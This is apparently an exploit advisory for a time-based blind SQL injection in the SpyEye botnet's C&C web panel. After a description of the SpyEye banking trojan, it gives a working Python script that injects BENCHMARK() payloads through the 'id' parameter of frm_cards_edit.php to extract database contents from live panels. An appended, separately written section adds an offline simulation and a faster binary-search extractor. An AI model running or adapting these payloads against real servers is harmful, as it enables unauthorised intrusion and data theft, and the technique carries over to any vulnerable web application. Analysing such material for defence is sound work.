Blind SQL injection Vulnerability Discovered in SpyEye Botnet by S4(uR4 ( r00tw0rm.com )
Exploit :
Vuln type : Blind SQL injection (time-based, via BENCHMARK())
Vuln script : frm_cards_edit.php (unsanitised "id" GET parameter)
Affected version : ALL
Targets : any live SpyEye C&C panel, e.g. those listed at https://spyeyetracker.abuse.ch/monitor.php
What is SpyEye ?
W32/SpyEye
Aliases : This is a list of aliases for the variant of SpyEye discovered in early February 2011 that has been actively targeting Norwegian banking websites:
Trojan-Spy.Win32.SpyEyes.evg (Kaspersky)
PWS-Spyeye.m (McAfee)
Trojan:Win32/EyeStye.H (Microsoft)
A variant of Win32/Spy.SpyEye.CA (NOD32)
W32/Malware.QOOC (Norman)
Trojan.Zbot (Symantec)
Mal_Xed-24 (Trend Micro)
Brief overview
SpyEye is a trojan with backdoor capabilities that attempts to steal sensitive information related to online banking and credit card transactions from an infected machine. SpyEye is sold by its author as an easy-to-configure kit containing the trojan executable itself, the command and control (C&C) server and a basic configuration for targeting banking websites. As of the beginning of 2011, SpyEye has merged functionality from the ZeuS trojan family, which was sold to the SpyEye author, and is becoming more sophisticated in the features and functionality it offers.
SpyEye can use a number of techniques to obtain a user's online banking credentials. Typically it employs a phishing-style attack: the victim is shown a faked logon web page, usually based on the bank's original logon page but with additional HTML form fields and JavaScript injected into it, so as to capture credentials that are not normally part of the logon process, such as PIN/TAN codes. A copy of the HTTP POST request is sent to the SpyEye C&C server, from which the attacker can extract the banking credentials or credit card details and start conducting fraudulent transactions. The web panel that receives and displays this stolen data is the component this advisory targets.
Exploit Preview :
Example:
```python
"""
Spyeye_r0073r

Time-based blind SQL injection in the SpyEye C&C panel (frm_cards_edit.php,
"id" GET parameter). One character of the result of <sql> is recovered per
matched request: when the guessed byte is right, BENCHMARK() stalls the
response well past `delay` seconds.

Usage: python spyeye_r0073r.py <host> </path/to/panel/> "<sql>"
"""
import sys
from http.client import HTTPConnection
from time import time
from urllib.parse import urlencode

if len(sys.argv) <= 3:
    sys.exit('usage: %s <host> </panel/path/> "<sql>"' % sys.argv[0])
print("[+]Started pwn...")
host = sys.argv[1]
path = sys.argv[2]      # panel path, must end with "/"
sql = sys.argv[3]       # subquery whose first value is extracted, e.g. a password hash
port = 80
extracted = ""

# Charset to try: ASCII 48 ('0') .. 122 ('z'), followed by the sentinel 0,
# which means "nothing matched at this position, so the string has ended".
full = list(range(48, 123)) + [0]
delay = 0.5             # seconds; BENCHMARK(9000000,SHA1(1)) takes far longer than this

a = 1                   # 1-based SUBSTRING() position (0 would always yield '' and never match)
while a <= 32:          # 32 positions covers an MD5 hex hash
    for i in full:
        if i == 0:
            sys.exit("\n[+]Finished\n")
        start = time()  # start time for the delay measurement
        conn = HTTPConnection(host, port)
        # Payload shape, e.g.:
        #   id=1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((<sql>),a,1)),0)=<i>),BENCHMARK(9000000,SHA1(1)),1));-- /*
        values = {"id": "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((" + sql + "),"
                        + str(a) + ",1)),0)=" + str(i)
                        + "),BENCHMARK(9000000,SHA1(1)),1));-- /*"}
        data = urlencode(values)
        print(data)
        conn.request("GET", path + "frm_cards_edit.php?" + data)
        response = conn.getresponse()
        read = response.read()
        print(read)
        if response.status == 404:
            sys.exit("[+]404")
        now = time()
        if now - start > delay:
            # The response stalled, so the condition held: byte i is the character at position a
            sys.stdout.write(chr(i))
            sys.stdout.flush()
            extracted += chr(i)
            a += 1
            break
print("\n[+]Extracted: " + extracted)
```
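To make the timing oracle behind the exploit above checkable without a live C&C, here is an added offline model (example code, not the original exploit and not SpyEye's own panel code): `fake_server` is a hypothetical stand-in for frm_cards_edit.php that evaluates the injected IF() the way MySQL would against a constructed 32-character secret and returns a simulated response time, and the two extraction routines run the exploit's linear charset scan beside a binary search on the ASCII value, which needs exactly 7 requests per position. The model also shows why a SUBSTRING() position of 0, as in the original script's `j=0`, can never match: MySQL's SUBSTRING() is 1-based and ASCII('') is 0. All timings and the secret are made up for the example.

```python
"""
Offline model of the time-based blind SQLi oracle (added example, not the
exploit or the SpyEye panel). Nothing here touches the network.
"""
import re

# Constructed sample target: what "<sql>" would return on the panel (MD5-style hex).
SECRET = "5f4dcc3b5aa765d61d8327deb882cf99"

BENCHMARK_SECONDS = 3.0   # simulated cost of BENCHMARK(9000000,SHA1(1)) on the true branch
NORMAL_SECONDS = 0.05     # simulated cost of an ordinary page load
DELAY = 0.5               # threshold, same value as the exploit's `delay`


def build_payload(sql, pos, op, val):
    """Same injected "id" value the exploit sends, generalised to =, > and < comparisons."""
    return ("1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((" + sql + ")," + str(pos) + ",1)),0)"
            + op + str(val) + "),BENCHMARK(9000000,SHA1(1)),1));-- /*")


_COND = re.compile(r"SUBSTRING\(\((?P<sql>.*)\),(?P<pos>\d+),1\)\),0\)(?P<op>[=<>])(?P<val>\d+)\)")


def fake_server(id_param, secret=SECRET):
    """Hypothetical stand-in for frm_cards_edit.php: evaluate the injected condition
    against `secret` (the subquery text itself is ignored) and return the simulated
    response time in seconds."""
    m = _COND.search(id_param)
    if m is None:
        return NORMAL_SECONDS
    pos, op, val = int(m.group("pos")), m.group("op"), int(m.group("val"))
    # MySQL SUBSTRING() is 1-based: position 0, or anything past the end, yields ''
    # and ASCII('') is 0. That is why a position of 0 never produces a match.
    ch = secret[pos - 1] if 1 <= pos <= len(secret) else ""
    code = ord(ch) if ch else 0
    cond = {"=": code == val, ">": code > val, "<": code < val}[op]
    return BENCHMARK_SECONDS if cond else NORMAL_SECONDS


def is_slow(payload):
    """The exploit's decision rule: a stalled response means the condition was true."""
    return fake_server(payload) > DELAY


def linear_extract(sql, maxlen=32):
    """What the exploit does: try every charset byte '0'..'z' at each position
    until one stalls. Returns (extracted string, number of requests)."""
    out, requests = "", 0
    for pos in range(1, maxlen + 1):
        for c in range(48, 123):
            requests += 1
            if is_slow(build_payload(sql, pos, "=", c)):
                out += chr(c)
                break
        else:
            break   # no byte matched: end of string (the exploit's sentinel-0 case)
    return out, requests


def binary_extract(sql, maxlen=32):
    """Binary search on the ASCII value 0..127 using '>' comparisons: exactly 7
    requests per position instead of up to 75. Returns (string, requests)."""
    out, requests = "", 0
    for pos in range(1, maxlen + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            requests += 1
            if is_slow(build_payload(sql, pos, ">", mid)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break   # ASCII 0 means SUBSTRING() returned '': past the end of the string
        out += chr(lo)
    return out, requests


if __name__ == "__main__":
    for name, fn in (("linear", linear_extract), ("binary", binary_extract)):
        value, n = fn("SELECT password FROM users LIMIT 1")
        print("%s: %s in %d requests" % (name, value, n))
```

Against a real target the request count is what matters: every request costs a full BENCHMARK() stall on a hit, so the binary-search variant finishes the 32-character string in 224 requests where the linear scan can take several hundred, and both leave an obvious burst of multi-second page loads in the panel's web server log.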